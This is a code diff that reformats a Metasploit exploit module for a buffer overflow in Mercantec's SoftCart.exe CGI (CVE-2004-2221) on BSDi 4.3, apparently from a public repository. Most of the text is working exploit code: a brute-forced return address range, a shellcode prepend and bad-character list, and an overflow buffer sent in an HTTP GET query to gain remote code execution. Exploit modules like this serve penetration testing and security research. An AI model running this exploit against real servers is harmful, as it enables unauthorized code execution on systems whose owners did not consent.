@@ -10,76 +10,83 @@ class MetasploitModule < Msf::Exploit::Remote
1010 include Msf ::Exploit ::Remote ::HttpClient
1111
1212 def initialize ( info = { } )
13- super ( update_info ( info ,
14- 'Name' => 'Mercantec SoftCart CGI Overflow' ,
15- 'Description' => %q{
16- This is an exploit for an undisclosed buffer overflow
17- in the SoftCart.exe CGI as shipped with Mercantec's shopping
18- cart software. It is possible to execute arbitrary code
19- by passing a malformed CGI parameter in an HTTP GET
20- request. This issue is known to affect SoftCart version
21- 4.00b.
22- } ,
23- 'Author' => [ 'skape' , 'trew' ] ,
24- 'References' =>
25- [
13+ super (
14+ update_info (
15+ info ,
16+ 'Name' => 'Mercantec SoftCart CGI Overflow' ,
17+ 'Description' => %q{
18+ This is an exploit for an undisclosed buffer overflow
19+ in the SoftCart.exe CGI as shipped with Mercantec's shopping
20+ cart software. It is possible to execute arbitrary code
21+ by passing a malformed CGI parameter in an HTTP GET
22+ request. This issue is known to affect SoftCart version
23+ 4.00b.
24+ } ,
25+ 'Author' => [ 'skape' , 'trew' ] ,
26+ 'References' => [
2627 [ 'CVE' , '2004-2221' ] ,
2728 [ 'OSVDB' , '9011' ] ,
2829 [ 'BID' , '10926' ] ,
2930 ] ,
30- 'Privileged' => false ,
31- 'Payload' =>
32- {
33- 'Space' => 1000 ,
31+ 'Privileged' => false ,
32+ 'Payload' => {
33+ 'Space' => 1000 ,
3434 'BadChars' => "\x09 \x0a \x0b \x0c \x0d \x20 \x27 \x5c \x3c \x3e \x3b \x22 \x60 \x7e \x24 \x5e \x2a \x26 \x7c \x7b \x7d \x28 \x29 \x3f \x5d \x5b \x00 " ,
35- 'MinNops' => 16 ,
36- 'Prepend' => "\x6a \x02 \x58 \x50 \x9a \x00 \x00 \x00 \x00 \x07 \x00 \x85 \xd2 \x75 \x0a \x31 \xc0 \x40 \x9a \x00 \x00 \x00 \x00 \x07 \x00 " ,
37- 'PrependEncoder' => "\x83 \xec \x7f " ,
35+ 'MinNops' => 16 ,
36+ 'Prepend' => "\x6a \x02 \x58 \x50 \x9a \x00 \x00 \x00 \x00 \x07 \x00 \x85 \xd2 \x75 \x0a \x31 \xc0 \x40 \x9a \x00 \x00 \x00 \x00 \x07 \x00 " ,
37+ 'PrependEncoder' => "\x83 \xec \x7f "
3838 } ,
39- 'Platform' => 'bsdi' ,
40- 'Targets' =>
41- [
39+ 'Platform' => 'bsdi' ,
40+ 'Targets' => [
4241 [
4342 'BSDi/4.3 Bruteforce' ,
4443 {
4544 'Bruteforce' =>
4645 {
4746 'Start' => { 'Ret' => 0xefbf3000 } ,
48- 'Stop' => { 'Ret' => 0xefbffffc } ,
49- 'Step' => 0
47+ 'Stop' => { 'Ret' => 0xefbffffc } ,
48+ 'Step' => 0
5049 }
5150 } ,
5251 ] ,
5352 ] ,
54- 'DisclosureDate' => '2004-08-19' ,
55- 'DefaultTarget' => 0 ) )
53+ 'DisclosureDate' => '2004-08-19' ,
54+ 'DefaultTarget' => 0 ,
55+ 'Notes' => {
56+ 'Stability' => [ CRASH_SERVICE_RESTARTS ] ,
57+ 'Reliability' => [ REPEATABLE_SESSION ] ,
58+ 'SideEffects' => [ IOC_IN_LOGS ]
59+ }
60+ )
61+ )
5662
5763 register_options (
5864 [
59- OptString . new ( 'URI' , [ false , "The target CGI URI" , '/cgi-bin/SoftCart.exe' ] )
60- ] )
65+ OptString . new ( 'URI' , [ false , 'The target CGI URI' , '/cgi-bin/SoftCart.exe' ] )
66+ ]
67+ )
6168 end
6269
6370 def brute_exploit ( address )
64- if not ( @mercantec )
71+ if ! @mercantec
6572 res = send_request_raw ( {
66- 'uri' => normalize_uri ( datastore [ 'URI' ] )
73+ 'uri' => normalize_uri ( datastore [ 'URI' ] )
6774 } , 5 )
68- @mercantec = ( res and res . body and res . body =~ /Copyright.*Mercantec/ )
69- fail_with ( Failure ::NotFound , " The target is not a Mercantec CGI" ) if not @mercantec
75+ @mercantec = res && res . body && res . body =~ /Copyright.*Mercantec/
76+ fail_with ( Failure ::NotFound , ' The target is not a Mercantec CGI' ) if ! @mercantec
7077 end
7178
7279 buffer =
73- " MAA+scstoreB"
80+ ' MAA+scstoreB'
7481 rand_text_alphanumeric ( 512 ) +
7582 [ address [ 'Ret' ] ] . pack ( 'V' ) +
76- " MSF!"
83+ ' MSF!'
7784 [ address [ 'Ret' ] + payload . encoded . length ] . pack ( 'V' ) +
7885 payload . encoded
7986
80- print_status ( "Trying #{ " %.8x" address [ 'Ret' ] } )
81- res = send_request_raw ( {
82- 'uri' => normalize_uri ( datastore [ 'URI' ] ) ,
87+ print_status ( "Trying #{ ' %.8x' address [ 'Ret' ] } )
88+ send_request_raw ( {
89+ 'uri' => normalize_uri ( datastore [ 'URI' ] ) ,
8390 'query' => buffer
8491 } , 5 )
8592
0 commit comments